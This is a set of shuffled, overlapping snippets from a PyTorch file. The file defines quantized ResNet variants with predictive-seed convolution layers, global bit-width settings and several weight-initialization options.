input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut =", "MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS", "class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes, stride=1):", "return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes,", "4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1", "SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test():", "masked_layers import layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT =", "PredictiveSeedConv2d from masked_layers import layers # Fixed NUM_BITS = 32", "planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False,", "writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride !=", "nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 * fan) with torch.no_grad():", "F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out += self.shortcut(x)", "# out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)", "+= self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module): expansion", "writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1", "self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\")", "sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def", "predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix)", "\"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with", "False PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER = 0", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)", "!= 1 or in_planes != self.expansion*planes: self.shortcut = nn.Sequential( #", "bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3", "module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan =", "sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def", "init_method) def get_bop_params(self): bop_params = [] for m in self.modules():", "sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self,", "= None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD = True", "MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD", "= msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY =", "expansion = 4 def __init__(self, in_planes, 
planes, stride=1): super(Bottleneck, self).__init__()", "= nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1,", "PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self):", "std elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain", "raise ValueError(f\"{init_method} is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\")", "F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out)", "sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY,", "True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution", "stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv", "* std elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if", "= nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out)) with", "= gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() *", "with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d(", "PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER = 0 #", "in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion", "def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3", "+= list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = [] for", "= 32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD =", "in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params", "self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None self.linear", "THRESHOLD = threshold SPARSIFY = sparsify SIGN = sign return", "= F.relu(out) return out class Bottleneck(nn.Module): expansion = 4 def", "= [] for m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):", "self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),", "ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "= module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method ==", "predictive_forward=True, 
writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and", "forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out =", "list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, num_blocks, stride): strides", "stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block,", "= F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out =", "writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes,", "NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD", "= PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride,", "nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 =", "# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False,", "or in_planes != self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes,", "= in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None)", "return bop_params def get_non_bop_params(self): non_bop_params = [] for m in", "self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes", "stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes ==", "self.in_planes == 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1,", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes,", "num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,", "stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes *", "as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers", "kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "numpy.lib.arraysetops import isin import torch import torch.nn as nn import", "with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())", "\"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization", "num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes)", "padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 =", "nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization option!\")", 
"init_method=\"standard\") -> None: for m in self.modules(): if isinstance(m, nn.Conv2d):", "NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD = False WRITER", "= predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD =", "non_bop_params def _make_layer(self, block, planes, num_blocks, stride): strides = [stride]", "out = F.relu(out) return out class Bottleneck(nn.Module): expansion = 4", "PSG in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1]", "fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain", "stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False,", "writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1,", "strides = [stride] + [1]*(num_blocks-1) layers = [] for stride", "sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def", "torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\":", "init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0", "None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to", "self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes,", "SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight", "# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes,", "in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride,", "self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 =", "= F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out =", "for m in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters())", "def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "test(): net = ResNet18() y = net(torch.randn(1,3,32,32)) print(y.size()) # test()", "padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)", "elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method ==", "nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block, planes,", "__init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes,", "stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,", "msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD,", "= gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) *", "nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # 
self.conv1 = nn.Conv2d(3, 64,", "== 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,", "64, num_blocks[2], stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes)", "SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152(", "planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3", "init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\":", "scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight)", "math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign()", "get_bop_params(self): bop_params = [] for m in self.modules(): if isinstance(m,", "out.view(out.size(0), -1) out = self.linear(out) return out def PsgSeedResNet20( num_classes=10,", "self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64,", "nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\")", "F.relu(out) return out class Bottleneck(nn.Module): expansion = 4 def __init__(self,", "ValueError(f\"{init_method} is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") ->", "import torch.nn.functional as F import math import numpy as np", "None: out = self.layer4(out) # out = F.avg_pool2d(out, 4) out", "math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method", "stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out", "== \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale", "self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)", "out = self.bn3(self.conv3(out)) out += self.shortcut(x) out = F.relu(out) return", "self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32,", "= self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3],", "32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION = False", "num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1", "\"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 *", "= conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes)", ") def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out)))", "64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)", "elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain =", "bias=False, num_bits=NUM_BITS, 
num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT,", "return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True,", "isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self,", "stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,", "MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY", "predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: #", "out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed,", "block, planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers", "bop_params += list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = []", "bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block,", "init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight,", "= msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD =", "sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard',", "math import numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from", "[3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "torch.nn.functional as F import math import numpy as np from", "return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT,", "\"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return", "self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)", "= PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride,", "math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif init_method", "torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\":", "layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 = self._make_layer(block, 16,", "== 16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 =", "return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out =", "= math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data =", "self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)", 
"fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out))", "msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes,", "out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out", "nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std", "torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method == \"standard\":", "stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward", "For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>,", "predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD,", "x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out))", "elif self.in_planes == 16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)", "self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes,", "Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch import", "PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,", "= nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride != 1 or", "stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers) def forward(self,", "stride != 1 or in_planes != self.expansion*planes: self.shortcut = nn.Sequential(", "padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS,", "and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,", "= module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))", "): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD", "\"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in", "in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "= True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD =", "if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def", "init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\":", "def test(): net = ResNet18() y = net(torch.randn(1,3,32,32)) print(y.size()) #", "planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers =", "msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, 
writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes,", "if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = []", "bop_params def get_non_bop_params(self): non_bop_params = [] for m in self.modules():", "layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD", "self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512,", "Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None", "== \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out =", "nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes,", "print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") ->", "= self.layer3(out) if self.layer4 is not None: out = self.layer4(out)", "[1]*(num_blocks-1) layers = [] for stride in strides: layers.append(block(self.in_planes, planes,", "SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes,", "= F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out)", "= False WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable", "forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out +=", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes,", "== \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan", "4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY = False", "msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module):", "super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4", "num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module,", "\"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale =", "= nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain /", "np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\":", "init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3],", "F.relu(out) return out class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64,", "MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 
THRESHOLD = 0.0 SPARSIFY", "= self.layer4(out) # out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out,", "threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False,", "predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes,", "self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out) return out class", "stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif", "= False SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True,", "SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"):", "return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True,", "nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self,", "# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1", "Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT = 4", "predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class", "== \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 /", "init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64, 